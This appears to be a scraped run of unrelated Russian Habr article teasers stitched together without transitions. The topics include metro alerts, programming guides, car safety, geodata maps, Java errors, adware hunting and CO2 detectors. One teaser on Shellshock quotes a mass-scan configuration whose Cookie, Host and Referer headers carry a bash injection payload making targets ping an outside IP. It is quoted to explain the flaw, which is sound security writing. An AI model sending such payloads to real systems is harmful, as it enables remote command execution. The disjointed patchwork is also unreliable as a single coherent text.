Давным-давно, примерно с год назад, когда Московское метро ломалось в рандомных местах и удивительно часто, у нас ( dcoder_mm & Irenica ) возникла мысль: сделать какой нибудь сервис, для оповещения о поломках.

Доброго времени суток, уважаемые хабравчане. За последнее время я увидел несколько интересных и полезных инструментов/библиотек/событий, которыми хочу поделиться с Хабром.

Learn X in Y minutes

Бесценный ресурс для многих опытных и начинающих программистов. Данный проект содержит набор кратких руководств по нескольким десяткам языков программирования, где очень емко изложены характерные особенности каждого из них. Понимание основных принципов, безусловно, упрощает знакомство с синтаксисом и ускоряет время до появления первых результатов, с новым и иным способом описания ваших мыслей. Радует, что многие материалы переведены на русский язык.

Кстати, еще есть Hyperpolyglot, где наглядно показаны различия между инструментами и языками программирования в таблицах.

Пока мы читаем новости про самоуправляемые автомобили, мало кто задумывается над тем, насколько незаметно развиваются системы безопасности современного авто. С каждым годом требования к безопасности повышаются: при тестировании по нормам Euro NCAP были введены боковые удары о столб, требуется обязательное наличие ESP, больше внимания уделено безопасности детей. Это меняет не только внешний облик автомобиля (минимизация резких углов и граней в передней части машины, появление пологих и округлых капотов), но и развитие систем «активной безопасности», призванных не допустить аварий вообще. Давайте узнаем как много «видит и знает» современный автомобиль о мире вокруг него.

Третий в мире производитель смартфонов Xiaomi представил носимую видеокамеру для экстремальных видов спорта Yi Action Camera, которая стоит 64 доллара и по некоторым характеристикам превосходит GoPro Hero. Капитализация производителя GoPro уменьшилась на 4,9 процента.

Веб-дизайн сильно изменился с конца прошлого века до этого дня. Многие сайты, запущенные в 1990-х и начале 2000-х годов, сейчас невозможно узнать. Под катом — популярные сайты интернета в целом и рунета в частности на момент их запуска.

Несколько лет назад я делал сайт о рыбалке и публиковал на нём карту окресностей города, отмечая интересные места. Я так увлёкся картами, что и сегодня занимаюсь дизайном геосервисов, а на досуге экспериментирую с картографическими визуализациями. Недавно я визуализировал статистику работы московского велопроката, а ранее опубликовал высотную модель города в виде разноцветной сетки улиц.

Это здорово, когда большие массивы данных об окружающем нас мире становятся визуальными, осязаемыми. Привлекает меня в этом не множество разноцветных линий или точек на тёмном фоне, а возможность наглядно показать и рассказать окружающим интересную историю, сделать эти данные полезными для людей. Мне хочется, чтобы увлечённых этой темой людей становилось больше — делиться знаниями друг с другом, обсуждать идеи.


Дома в центре Москвы разного цвета в зависимости от площади здания.
Данные: © Участники OpenStreetMap

О дизайне в картографии я уже рассказывали ещё буду рассказывать, ведь об этом можно рассказать много интересного. В этой истории, речь пойдёт не про традиционные карты.

Я задумал собрать что знаю про картографические визуализации и рассказать об этом. В итоге, у меня получился онлайн-курс «Визуализация геоданных»  —  серия мини-лекций об общих принципах и инструментах для работы с геоданными. К каждой части я собрал ссылки на дополнительные материалы и примеры рабочих файлов, чтобы можно было погрузиться в детали и попробовать что-то сделать самостоятельно. Этот пост собран из материалов курса.

Здравствуйте, меня зовут Александр Акбашев, я Lead QA Engineer в проекте Skyforge. А также по совместительству ассистент tully в Технопарке на курсе «Углубленное программирование на Java». Наш курс идет во втором семестре Технопарка, и мы получаем студентов, прошедших курсы по C++ и Python. Поэтому я давно хотел подготовить материал, посвященный самым распространенным ошибкам новичков в Java. К сожалению, написать такую статью я так и не собрался. К счастью, такую статью написал наш соотечественник — Михаил Селиванов, правда, на английском. Ниже представлен перевод данной статьи с небольшими комментариями. По всем замечаниям, связанным с переводом, прошу писать в личные сообщения.



Изначально язык Java создавался для интерактивного телевидения, однако со временем стал использоваться везде, где только можно. Его разработчики руководствовались принципами объектно-ориентированного программирования, отказавшись от излишней сложности, свойственной тем же С и С++. Платформонезависимость виртуальной машины Java сформировала в своё время новый подход к программированию. Добавьте к этому плавную кривую обучения и лозунг «Напиши однажды, запускай везде», что почти всегда соответствует истине. Но всё-таки ошибки до сих пор встречаются, и здесь я хотел бы разобрать наиболее распространённые из них.

Все можно сделать лучше, чем делалось до сих пор. /Генри Форд/

Каждый день я работаю за компьютером в среднем 10 часов. В данной статье описывается опыт настройки Windows 7 для ускорение выполнения типовых задач, который может пригодиться и вам.

В целом все сводится к минимизации временных затрат на выполнение задач. Чем меньше времени уходит на выполнение задач, тем большее их количество можно успеть сделать за единицу времени и тем самым повысить свою продуктивность.

Я выделяю несколько типов действий для ускорения выполнения типовых задач:

1. Использование дополнительного софта
2. Настройка интерфейсов Windows и приложений
3. Использование горячих клавиш
4. Ускорение работы системы (за счет отключение неиспользуемого функционала)

У немецкого программиста Лукаса Хартманна (Lukas F. Hartmann) недавно случился второй день рождения. Он узнал, что диагностированная у него по результатам генетического теста смертельная болезнь — всего лишь баг программы. В смысле, не его генетической программы, а компьютерной программы статистического анализа генетической информации.

23andMe — частная биотехнологическая компания из США, которая осуществляет изучение генома всего за $99. Человек должен отправить в фирму капельку слюны, а в ответ получит логин и пароль для доступа к результатам анализа (предупреждение: отправка генетического материала из России запрещена законодательством РФ, фирма 23andMe не высылает контейнеры для образцов в Россию).

В статье представлен прагматичный подход по созданию одного из элементов Умного Дома — экономной защиты от потопа (антипротечки) на базе универсального контроллера домашней автоматизации.

Главные отличия от ранее представленных на хабре решений данной задачи – простота реализации, относительно дешево + для повторения не надо быть программистом. Правда паять все равно придется, но всего 2 раза.

Что такое «боты тёмной стороны силы»? Обозначим так сканирующие программы (поисковые роботы, пауки), которые используют злоумышленники. В отличие от роботов поисковых систем [1, 2], «боты тёмной стороны силы» (в дальнейшем для краткости — боты) заняты поиском уязвимостей, вредоносных программных закладок, конфиденциальной информации и т. д. Действия, аналогичные работе бота, может выполнять и человек, но использование бота, по понятным причинам, эффективнее и более распространено.

Привет, Хабр!

В этой статье предлагаю читателю ознакомится с уязвимостями веб-приложений (и не только), по классификации OWASP Top-10, и их эксплуатацией на примере bWAPP.

Помните Heartbleed? Shellshock можно отнести к той же «весовой категории», с таким же стильным названием, хоть и без классного логотипа (кому-то из департамента маркетинга этой уязвимости надо бы этим заняться). Но у Shellshock есть потенциал стать не менее важной птицей, чем Heartbleed. И сейчас я хотел бы собрать воедино всю необходимую информацию, которая поможет всем желающим справиться с ситуацией и избежать возможных проблем из-за неочевидной, на первый взгляд, угрозы.

Для начала позвольте поделиться с вами некоторой информацией из блога Роберта Грэма, который провёл превосходный анализ уязвимости. Рассмотрим представленный ниже HTTP-запрос:

target = 0.0.0.0/0
port = 80
banners = true
http-user-agent = shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
http-header = Cookie:() { :; }; ping -c 3 209.126.230.74
http-header = Host:() { :; }; ping -c 3 209.126.230.74
http-header = Referer:() { :; }; ping -c 3 209.126.230.74

Если его применить к диапазону уязвимых IP, то получим такой результат:



Проще говоря, Роберт заставил кучу удалённых машин пинговать его, просто отправив в сеть специально сформированный запрос. Беспокойство вызывает тот факт, что он заставил эти машины выполнить произвольную команду (в данном случае безобидный ping), что открывает широчайшие возможности.

Так сложилось что часто наши внутренние сервисы вырастали в полноценные продукты, такие как — UrlEye.com. Несколько месяцев назад в нашем маленьком стартапе возникла нужда держать под контролем содержимое страниц наших проектов. Перебрав предложения нескольких других сервисов, пришли к выводу что они хоть и хороши, но немного нам не подходят и приняли решение написать свой собственный сервис. Так родился проект UrlEye.com — бесплатный сервис для наблюдением за веб-сайтами, с возможностями отслеживания изменений содержимого страниц. Простыми словами, если вам нужно быть уверенным что ваш сайт не упал или например надо отследить момент когда с сайта пропало/появилось ключевое слово то теперь для этого и есть наш бесплатный сервис — UrlEye.com.

За последние сутки сотни новостных сайтов (клац и тыц) перепечатывают одну интересную новость, рассказывающую про обнаружение очередных зловредных приложений в Google Play. На этот раз adware показывало назойливую рекламу каждый раз при разблокировке устройства и было установлено на миллиарды миллионы телефонов и планшетов. К счастью, антивирусная компания Avast вовремя обнаружила угрозу и приложения были удалены.

Под катом я расскажу свою версию событий: как я вычислял и искал adware в Google Play, декомпилировал код adware sdk, можно ли дождаться ответа от поддержки Google, почему мобильные антивирусы бесполезны и как им удается на горячем инфоповоде сделать себе хорошую бесплатную рекламу.

Компьютерные игры – хороший пример того, насколько долго человек может сохранять внимание на одной задаче. Почему бы нам не воспользоваться этим на благо изучения языка?

В статье хочу поделиться своим мнением о том, какие типы игр подходят для изучения языка, и привести список тех, которые мне показались эффективными. Надеюсь, в будущем появится больше игр, пригодных для этих целей. А еще лучше, если разработчики начнут закладывать возможность изучения языка в основу геймплея. Уверен, это увеличило бы спрос на игры, учитывая, что многие расценивают их как способ бездарно убить время.

5 февраля 2015 года на экраны кинотеатров РФ выйдет замечательный фильм The Imitation Game («Игра в имитацию»), если его не запретит Госкомонадзор или другой цензурный орган.

Фильм снят по книге Эндрю Ходжеса «Алан Тьюринг: Энигма» и описывает жизнь и работу знаменитого английского математика Алана Тьюринга, который помог взломать код немецкой шифровальной машины Энигма во время Второй мировой войны.

Если думаете, что сейчас я буду читать мантры вроде «нужно сосредоточиться на работе», «обязательно любите свою работу и себя», ошибаетесь. Эта статья не об управлении временем или проектами. Гики решают такие проблемы с помощью даджетов. В данном случае — детектора углекислого газа.

Все дело в том, что если уровень углекислого газа в воздухе выше нормы, то самочувствие человека резко ухудшается. Появляется зевота. Человек, сам того не замечая, начинает раздражаться по пустякам, не сможет концентрироваться на важном деле, а если и сосредоточится, то мыслительный процесс будет протекать медленно. Естественно такие симптомы могут иметь и другие причины, но наиболее частая в реальной жизни и очень легко решаемая — это слишком высокая концентрация углекислого газа.

По этой же причине часто возникают «офисные войны». В каждом офисе есть сотрудники «которым душно» и другие «которым дует». Из-за этого часто возникают конфликты, т.к. объективного показателя «духоты» нет. Мы в Даджете решили эту проблему при помощи детектора СО2. Войны прекратились раз и навсегда.

Пару дней назад у Билайн и МТС появились тарифы, в которых бесплатно и без абонентской платы пользователю доступно небольшое количество интернет-трафика.

Тариф Билайн «Интернет навсегда» даёт каждый месяц 200 мегабайт по всей России бесплатно и без абонентской платы.



Опция «МТС Планшет Mini» даёт бесплатно и без абонентской платы 17 мегабайт в день по всей России.

Рэймонд Курцвейл, предсказавший в 1990 победу компьютера в шахматном матче с человеком, состоявшуюся в 1997, возможность персональных компьютеров получить ответы по интернету без проводов к 2010 году и использование в начале 2000-х экзоскелетов в медицине дал прогноз на следующие 25 лет. Людям запретят вести машину на скоростных шоссе, мы сможем загружать своё сознание в компьютер и подключим наши мозги к искусственному неокортексу.

Американский авиационный инженер и предприниматель Питер Диамандис для своей новой книги BOLD взял интервью у Рэймонда Курцвейла.